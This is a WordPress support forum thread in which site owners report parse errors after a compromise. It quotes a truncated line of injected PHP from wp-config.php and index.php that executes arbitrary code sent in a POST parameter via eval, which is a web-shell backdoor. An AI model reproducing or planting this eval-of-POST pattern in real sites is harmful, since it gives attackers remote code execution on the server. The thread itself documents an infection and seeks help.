WordPress.org

Ready to get started?Download WordPress

Forums

Cannot Log In to Admin Panel or See Blog (5 posts)

  1. nikitagale
    Member
    Posted 5 years ago #

    When attempting to access my blog, I get the following error message:

    Parse error: syntax error, unexpected T_VARIABLE in /home/content/t/i/n/tinymaestro/html/wp-config.php on line 1

    This is what the first two lines of my wp-config.php sheet look like:

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode

    Can anyone help me figure out what the problem is and better yet, how to fix it? Thanks!

  2. ClaytonJames
    Member
    Posted 5 years ago #

    If that is in your wp-config.php file, I would make an unqualified suggestion that perhaps you have been hacked.

  3. nikitagale
    Member
    Posted 5 years ago #

    Do you have any idea how I can even get into the admin panel? I deleted the theme that I was using and now I'm seing this when I go to my site:

    Parse error: syntax error, unexpected T_VARIABLE in /home/content/t/i/n/tinymaestro/html/index.php on line 1

    This is line 1 in my index.php file:

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!

    It just looks likes the same code that was in my wp-config.php sheet.

  4. ClaytonJames
    Member
    Posted 5 years ago #

    You can try to replace your index.php with a backup copy, but you will still have to deal with the hack. I suspect that you may find unwanted code injected into many files. There have been some similar issues discussed in the forum. Perhaps someone found a solution or two somewhere in these threads that would be helpful.

    Place this string in the search box, and see what comes up for you.

    php if(!function_exists('tmp_lkojfghx'))

  5. CoachFletch
    Member
    Posted 5 years ago #

    I have the exact same issue as nikitagale has had. This occurred yesterday.

    Parse error: parse error, unexpected T_VARIABLE in /home/content/d/a/l/dalefletcher3/html/new/wp-config.php on line 1

    This occurs when I try to access the admin area as well as my blog page.

    Any solutions please?

    Thanks!

Topic Closed

This topic has been closed to new replies.

About this Topic